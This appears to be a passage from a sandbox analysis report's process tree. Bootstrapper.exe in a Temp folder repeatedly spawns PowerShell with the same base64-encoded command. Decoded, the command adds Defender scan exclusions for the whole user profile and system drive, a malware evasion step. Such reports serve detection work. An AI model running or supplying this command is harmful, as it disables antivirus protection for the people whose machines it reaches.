        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        56⤵
        
        PID:4600
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        56⤵
        
        PID:3228
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        57⤵
        
        PID:6416
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        57⤵
        
        PID:6740
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        58⤵
        
        PID:8808
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        58⤵
        
        PID:6000
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        59⤵
        
        PID:6004
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        59⤵
        
        PID:8252
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        60⤵
        
        PID:5476
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        60⤵
        
        PID:7160
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        61⤵
        
        PID:5732
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        61⤵
        
        PID:5944
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        62⤵
        
        PID:7868
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        62⤵
        
        PID:8136
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        63⤵
        
        PID:7316
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        63⤵
        
        PID:8104
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        64⤵
        
        PID:2100
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        64⤵
        
        PID:7440
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        65⤵
        
        PID:8076
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        65⤵
        
        PID:6904
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        66⤵
        
        PID:3984
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        66⤵
        
        PID:7956
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        67⤵
        
        PID:5560
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        67⤵
        
        PID:8576
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        68⤵
        
        PID:7848
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        68⤵
        
        PID:1188
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        69⤵
        
        PID:7768
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        69⤵
        
        PID:7652
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        70⤵
        
        PID:6916
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        70⤵
        
        PID:8612
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        71⤵
        
        PID:8588
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        71⤵
        
        PID:7268
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        72⤵
        
        PID:2784
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        72⤵
        
        PID:2448
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        73⤵
        
        PID:8016
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        73⤵
        
        PID:5504
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        74⤵
        
        PID:7980
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        74⤵
        
        PID:8696
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        75⤵
        
        PID:7656
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        75⤵
        
        PID:8020
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        76⤵
        
        PID:4840
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        76⤵
        
        PID:2992
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        77⤵
        
        PID:8804
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        77⤵
        
        PID:5596
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        78⤵
        
        PID:6800
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        78⤵
        
        PID:7800
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        79⤵
        
        PID:8964
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        79⤵
        
        PID:8540
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        80⤵
        
        PID:5416
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        80⤵
        
        PID:8800
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        81⤵
        
        PID:7272
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        81⤵
        
        PID:6736
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        82⤵
        
        PID:4556
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        82⤵
        
        PID:8628
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        83⤵
        
        PID:6872
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        83⤵
        
        PID:680
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        84⤵
        
        PID:6636
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        84⤵
        
        PID:5408
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        85⤵
        
        PID:676
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        85⤵
        
        PID:7772
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        86⤵
        
        PID:6192
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        86⤵
        
        PID:5596
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        87⤵
        
        PID:5256
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        87⤵
        
        PID:8180
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        88⤵
        
        PID:680
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
